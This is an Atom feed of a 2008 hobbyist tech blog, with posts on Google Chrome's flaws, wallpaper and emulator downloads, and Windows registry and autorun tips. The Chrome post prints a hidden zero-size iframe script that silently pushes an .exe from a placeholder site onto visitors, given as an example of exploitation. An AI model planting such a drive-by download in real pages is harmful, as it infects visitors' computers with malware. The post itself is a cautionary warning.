like those above..&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 12px; white-space: pre;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-7478843583727059572?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/7478843583727059572/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/90-most-useful-online-generator-sites.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7478843583727059572" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7478843583727059572" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/90-most-useful-online-generator-sites.html" title="9.0 Most Useful Online Generator Sites For &quot;Web 2.0&quot; Style" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMbOiG918pI/AAAAAAAAAYY/ITSUyb93Zmg/s72-Rc/1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-1125903864966063061</id><published>2008-09-09T06:05:00.014+08:00</published><updated>2008-09-10T03:47:59.289+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="News and Information" /><category scheme="http://www.blogger.com/atom/ns#" term="browser" /><title type="text">Google Chrome™ : Between [+ve] &amp; [-ve] Views</title><content type="html">&lt;div style="text-align: justify;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMWuMXcnf0I/AAAAAAAAAXI/XBZVA5bjV1M/s1600-h/google-chrome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMWuMXcnf0I/AAAAAAAAAXI/7xATlXA_0uw/s320-R/google-chrome.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;&lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;Google Chrome&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;™ &lt;/span&gt;: The most advance web browser&amp;nbsp;nowadays.&amp;nbsp;isn't&amp;nbsp;it? From the &lt;span style="font-weight: bold;"&gt;[+ve]&lt;/span&gt; sight of it's "design" and "friendly GUI", it's totally yes; with its new features such as "One box for everything" that combines several usage at one page ['tabbed view : view most visited page', 'search engine', 'recent bookmark' and 'recent closed tabs'], once you open a new tab. Plus it's unique upside tabs [i&lt;span style="font-style: italic;"&gt;:+fav:&lt;/span&gt;it]. BUT, from the sight of security and it's &lt;span style="font-weight: bold;"&gt;[-ve]&lt;/span&gt;, this first&amp;nbsp;released of&amp;nbsp;Google&amp;nbsp;Chrome&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;™&lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;&amp;nbsp;is a little bit "disappointing" as it comes with a "security holes" that can be easily exploited by those "exploiter". FYinfo, what's I'm&amp;nbsp;pointing of is, Google Chrome&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;™, &lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;allows files [eg:executables.exe] to be automatically downloaded to the user's computer without prompting the user. This "security holes" can be easily used by "exploiter" to spread anonymous files [eg:trojan/malware] to your comp via an exploited sites. So, be alert in to&amp;nbsp;Google Chrome&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;™&lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;&amp;nbsp;downloaded&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;&lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;&amp;nbsp;files.&amp;nbsp;This is an example of codes in the exploited page that may have used by the "exploiter" to bypass&amp;nbsp;Google Chrome&lt;span style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre;"&gt;™ &lt;span style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;"security holes":&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin: 0px;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;textarea cols="55" name="readonlycommandfields" readonly="readonly" rows="5"&gt;&amp;lt;script&amp;gt; document.write('&amp;lt;iframe src="http://www.SomeSortOfSite.com/anonymous.exe" frameborder="0" width="0" height="0"&amp;gt;'); &amp;lt;/script&amp;gt;&lt;/textarea&gt;&lt;/center&gt;&lt;/div&gt;&lt;div style="margin: 0px;"&gt;&lt;blockquote&gt;p/s: Hope that the updated&amp;nbsp;[un-beta]&amp;nbsp;version will fix the "holes" in&amp;nbsp;Google Chrome™..Anyway, thanks for Google for this great advance free open source web browser. Hey!! Officially download&amp;nbsp;Google Chrome™ [&lt;a href="http://www.google.com/chrome/?hl=en"&gt;here&lt;/a&gt;]&lt;/blockquote&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-1125903864966063061?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/1125903864966063061/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/google-chrome-between-ve-ve-views.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/1125903864966063061" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/1125903864966063061" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/google-chrome-between-ve-ve-views.html" title="Google Chrome™ : Between [+ve] &amp; [-ve] Views" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMWuMXcnf0I/AAAAAAAAAXI/7xATlXA_0uw/s72-Rc/google-chrome.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-5224739390725376127</id><published>2008-09-08T06:44:00.003+08:00</published><updated>2008-09-08T08:11:09.460+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="wallpaper" /><category scheme="http://www.blogger.com/atom/ns#" term="design" /><title type="text">Flow Wallpaper With *.psd Pack</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Pretty well for me. 2 pack here. My first try in making sleek glowing[ish] wallpaper. I'll upload the tutorial later. Quite hard to make a photoshop tutorial, so here is the pack that comes with raw files&amp;nbsp;[*.psd]&amp;nbsp;inside. Let you see the raw files first in making this wallpaper [i prefer to call it "WallaPaper"]. =X. Right now the tutorial is still under construction =P. See the WallaPaper below and have a nice download.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRrMjIzFrI/AAAAAAAAAWo/gnY-KSySu6I/s1600-R/Copy+of+bubble_flow_waller_with__psd_by_zxara.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRrMjIzFrI/AAAAAAAAAWo/gnY-KSySu6I/s200-R/Copy+of+bubble_flow_waller_with__psd_by_zxara.jpg" /&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRrV-rKfmI/AAAAAAAAAWw/I1cUuKEj8Sg/s1600-R/Copy+of+My_Flow_Waller_by_zxara.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRrV-rKfmI/AAAAAAAAAWw/I1cUuKEj8Sg/s200-R/Copy+of+My_Flow_Waller_by_zxara.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;[&lt;a href="http://www.deviantart.com/download/89500682/bubble_flow_waller_with__psd_by_zxara.rar"&gt;download&lt;/a&gt;] &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;[&lt;a href="http://www.deviantart.com/download/85262665/My_Flow_Waller_by_zxara.rar"&gt;download&lt;/a&gt;]&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-5224739390725376127?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/5224739390725376127/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/flow-wallpaper-with-psd-pack.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/5224739390725376127" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/5224739390725376127" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/flow-wallpaper-with-psd-pack.html" title="Flow Wallpaper With *.psd Pack" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRrMjIzFrI/AAAAAAAAAWo/gnY-KSySu6I/s72-Rc/Copy+of+bubble_flow_waller_with__psd_by_zxara.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-4576870956643497411</id><published>2008-09-08T06:28:00.004+08:00</published><updated>2008-09-09T09:45:29.377+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="games" /><category scheme="http://www.blogger.com/atom/ns#" term="emulator" /><title type="text">AIO Game Emulator Pack</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRXoIO1SWI/AAAAAAAAAWY/Ao2OXYHjVxo/s1600-h/AIOemulator.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRXoIO1SWI/AAAAAAAAAWY/vc7QUwASMEA/s320-R/AIOemulator.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;Hey gamers! This is what you looking for. A collection of 21 Game Emulator :LoL: for PC including ;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;PS2&lt;br /&gt;&lt;/li&gt;&lt;li&gt;PSX&lt;br /&gt;&lt;/li&gt;&lt;li&gt;XBOX&lt;br /&gt;&lt;/li&gt;&lt;li&gt;GAMECUBE&lt;br /&gt;&lt;/li&gt;&lt;li&gt;PSP&lt;br /&gt;&lt;/li&gt;&lt;li&gt;DREAMCAST&lt;br /&gt;&lt;/li&gt;&lt;li&gt;N64&lt;br /&gt;&lt;/li&gt;&lt;li&gt;GBA&lt;br /&gt;&lt;/li&gt;&lt;li&gt;GB&lt;br /&gt;&lt;/li&gt;&lt;li&gt;WONDERSWAN&lt;br /&gt;&lt;/li&gt;&lt;li&gt;PC-ENGINE&lt;br /&gt;&lt;/li&gt;&lt;li&gt;SAGA-SATURN&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NES&lt;br /&gt;&lt;/li&gt;&lt;li&gt;SNES&lt;br /&gt;&lt;/li&gt;&lt;li&gt;GAME GEAR&lt;br /&gt;&lt;/li&gt;&lt;li&gt;SAGA MEGADRIVE&lt;br /&gt;&lt;/li&gt;&lt;li&gt;MAME&lt;br /&gt;&lt;/li&gt;&lt;li&gt;PC-88&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NEO GEO POCKET&lt;br /&gt;&lt;/li&gt;&lt;li&gt;KAWAKS&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NEBULAR&lt;/li&gt;&lt;/ol&gt;&lt;div style="text-align: center;"&gt;[46MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://uploads.bizhat.com/file/324647"&gt;download now&lt;/a&gt;]&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-4576870956643497411?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/4576870956643497411/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/aio-game-emulator-pack.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4576870956643497411" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4576870956643497411" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/aio-game-emulator-pack.html" title="AIO Game Emulator Pack" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMRXoIO1SWI/AAAAAAAAAWY/vc7QUwASMEA/s72-Rc/AIOemulator.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-7494424469509408594</id><published>2008-09-08T00:35:00.001+08:00</published><updated>2008-09-08T01:39:52.587+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><category scheme="http://www.blogger.com/atom/ns#" term="Modification" /><title type="text">how2.0 : Customizing The System Tray Clock</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMQDRiZXteI/AAAAAAAAAWQ/MbolyhVBXB0/s1600-h/clock_custom.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMQDRiZXteI/AAAAAAAAAWQ/rlo0ewfPk0I/s320-R/clock_custom.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;Now, here is a nice trick for you. Customizing your system tray clock like the picture above. It has been applied to my comp :). Pretty nice.&amp;nbsp;But maybe you can corrupt some trial licenses of software that you may have installed. Here it is :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 1&lt;/span&gt;&lt;br /&gt;Open up your registry editor [start &amp;gt; run &amp;gt; type "regedit"]&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 2&lt;/span&gt;&lt;br /&gt;Navigate to :&amp;nbsp;HKEY_CURRENT_USER\Control Panel\International&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 3&lt;/span&gt;&lt;br /&gt;There is two strings named "s1159" and "s2359". By default, the "s1159" is for AM and "s2359" is for PM. Just right click to the value and edit the AM and PM text. Make sure the text is not too long because if it is too long, it will be a problem to view it.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 4&lt;/span&gt;&lt;br /&gt;If both of the string is not in there, just create the two strings&amp;nbsp;"s1159" and "s2359"&lt;br /&gt;&lt;br /&gt;Now, you have a special clock of your own. Change applied may start to active after user logoff or restart the comp. Else, just refresh your desktop to activate it..&amp;nbsp;Happy modding :) =X and good luck&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-7494424469509408594?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/7494424469509408594/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-customizing-system-tray-clock.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7494424469509408594" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/7494424469509408594" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-customizing-system-tray-clock.html" title="how2.0 : Customizing The System Tray Clock" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_VdjeFVKNi6c/SMQDRiZXteI/AAAAAAAAAWQ/rlo0ewfPk0I/s72-Rc/clock_custom.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-4802327277272087250</id><published>2008-09-08T00:06:00.001+08:00</published><updated>2008-09-08T00:32:40.802+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="autorun" /><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><title type="text">how2.0 : Turning Off Autorun Features For All Drive</title><content type="html">Concerning about various virus that have been vastly spread within the removable media such as flash drive, this tip maybe useful to be applied. Most of the viruses and malware nowadays had used the autorun features in WinXP to spread over. [eg: when user double click at their removable drive, the virus start to active]. Here is the trick to turning off the autorun features :&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step 1&lt;/span&gt;&lt;br /&gt;Click&amp;nbsp;on&amp;nbsp;[Start]&amp;nbsp;&amp;gt;&amp;nbsp;[run]&amp;nbsp;&amp;gt;&amp;nbsp;and&amp;nbsp;type&amp;nbsp;"gpedit.msc"&amp;nbsp;in&amp;nbsp;the&amp;nbsp;box.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step&amp;nbsp;2&lt;/span&gt;&lt;br /&gt;Navigate&amp;nbsp;to&amp;nbsp;[Computer&amp;nbsp;Configuration]&amp;nbsp;&amp;gt;&amp;nbsp;[Administrative&amp;nbsp;Templates]&amp;nbsp;&amp;gt;&amp;nbsp;[System]&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step&amp;nbsp;3&lt;/span&gt;&lt;br /&gt;Go&amp;nbsp;to&amp;nbsp;link&amp;nbsp;[Turn&amp;nbsp;of&amp;nbsp;AutoPlay]&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step&amp;nbsp;4&lt;/span&gt;&lt;br /&gt;Double&amp;nbsp;click&amp;nbsp;that&amp;nbsp;link&amp;nbsp;and&amp;nbsp;you&amp;nbsp;will&amp;nbsp;now&amp;nbsp;see&amp;nbsp;a&amp;nbsp;new&amp;nbsp;windows&amp;nbsp;was&amp;nbsp;open.&amp;nbsp;Go&amp;nbsp;to&amp;nbsp;the&amp;nbsp;[Tab&amp;nbsp;Setting],&amp;nbsp;Check&amp;nbsp;the&amp;nbsp;box&amp;nbsp;to&amp;nbsp;Enable&amp;nbsp;[turn&amp;nbsp;off&amp;nbsp;the&amp;nbsp;autoplay],&amp;nbsp;If&amp;nbsp;you&amp;nbsp;want&amp;nbsp;to&amp;nbsp;apply&amp;nbsp;this&amp;nbsp;for&amp;nbsp;all&amp;nbsp;drive&amp;nbsp;just&amp;nbsp;go&amp;nbsp;to&amp;nbsp;[Turn&amp;nbsp;of&amp;nbsp;AutoPlay]&amp;nbsp;to&amp;nbsp;and&amp;nbsp;choose&amp;nbsp;[All&amp;nbsp;Drive]&amp;nbsp;&amp;gt;&amp;nbsp;then&amp;nbsp;click&amp;nbsp;ok.&lt;br /&gt;&lt;br /&gt;And now you have just turned off the outorun features in your WinXP comp :)&lt;br /&gt;&lt;blockquote&gt;p/s: From my observation, most of the comp user simply just double click at their flash drive that make a certain virus will load easily. Make use of the "address bar" to navigate through your drive. Maybe it's slow but it's more safety :) indeed..&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-4802327277272087250?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/4802327277272087250/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-turning-off-autorun-features-for.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4802327277272087250" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4802327277272087250" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-turning-off-autorun-features-for.html" title="how2.0 : Turning Off Autorun Features For All Drive" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-4008708003637368196</id><published>2008-09-07T09:10:00.003+08:00</published><updated>2008-09-07T09:31:37.072+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Yahoo Messenger" /><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><category scheme="http://www.blogger.com/atom/ns#" term="regedit" /><category scheme="http://www.blogger.com/atom/ns#" term="registry" /><title type="text">how2.0 : Log In Several User In Yahoo! messenger 8</title><content type="html">Wanna log in several user in one Yahoo! messenger? Here come the simple trick:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step 1&lt;/span&gt;&lt;/div&gt;&lt;div&gt;Fire up notepad and type :&lt;/div&gt;&lt;div&gt; &lt;div&gt;REGEDIT4&lt;br /&gt;&lt;ol&gt;&lt;/ol&gt;[HKEY_CURRENT_USER\Software\yahoo\pager\Test]&lt;/div&gt;&lt;div&gt;"Plural"=dword:00000001&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step 2&lt;/span&gt;&lt;/div&gt;&lt;div&gt;Save the document as Ym8MultiLogin.reg&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;Step 3&lt;/span&gt;&lt;/div&gt;&lt;div&gt;Merge the file that you had just created into the registry and bling!! You can now login with several user in one Yahoo! messenger. Just make sure that you uncheck the "automatic login" at Yahoo! messenger startup.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;p/s&lt;/span&gt;: you can create uninstallation file by changing the ["Plural"=dword:] value from "00000001" to "00000000" and save it as Ym8MultiLogin_uninstall.reg .If you want to download both of the registration files by simply clicking [&lt;a href="http://uploads.bizhat.com/file/323650"&gt;here&lt;/a&gt;]&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-4008708003637368196?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/4008708003637368196/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-log-in-several-user-in-yahoo.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4008708003637368196" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4008708003637368196" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-log-in-several-user-in-yahoo.html" title="how2.0 : Log In Several User In Yahoo! messenger 8" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-203456887122457368</id><published>2008-09-07T07:22:00.005+08:00</published><updated>2008-09-07T07:32:37.661+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bootscreen" /><category scheme="http://www.blogger.com/atom/ns#" term="design" /><category scheme="http://www.blogger.com/atom/ns#" term="Modification" /><title type="text">Bootscreen : Compaq Devil Edition v1</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMMS2UgLhnI/AAAAAAAAAVo/ojZSsCMQJSU/s1600-h/Shots.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_VdjeFVKNi6c/SMMS2UgLhnI/AAAAAAAAAVo/ojZSsCMQJSU/s320/Shots.bmp" border="0" alt="" id="BLOGGER_PHOTO_ID_5243055115615307378" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;This is my first self created BootScreen design for XP. Made for my Compaq laptop but compatible to all WinXP machine. Submitted at deviantart.com on April 19, 2008. More Boot Screen will be coming ~ soon. :) Glad if you have some idea for me to make another BootScreen as your request. Just shouted me ya!&lt;/div&gt;&lt;div style="text-align: center;"&gt;[1MB]&lt;/div&gt;&lt;div style="text-align: center;"&gt;[&lt;a href="http://www.deviantart.com/download/83257060/Compaq_Devil_Edition_by_zxara.rar"&gt;download now&lt;/a&gt;]&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-203456887122457368?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/203456887122457368/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/bootscreen-compaq-devil-edition-v1.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/203456887122457368" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/203456887122457368" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/bootscreen-compaq-devil-edition-v1.html" title="Bootscreen : Compaq Devil Edition v1" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" 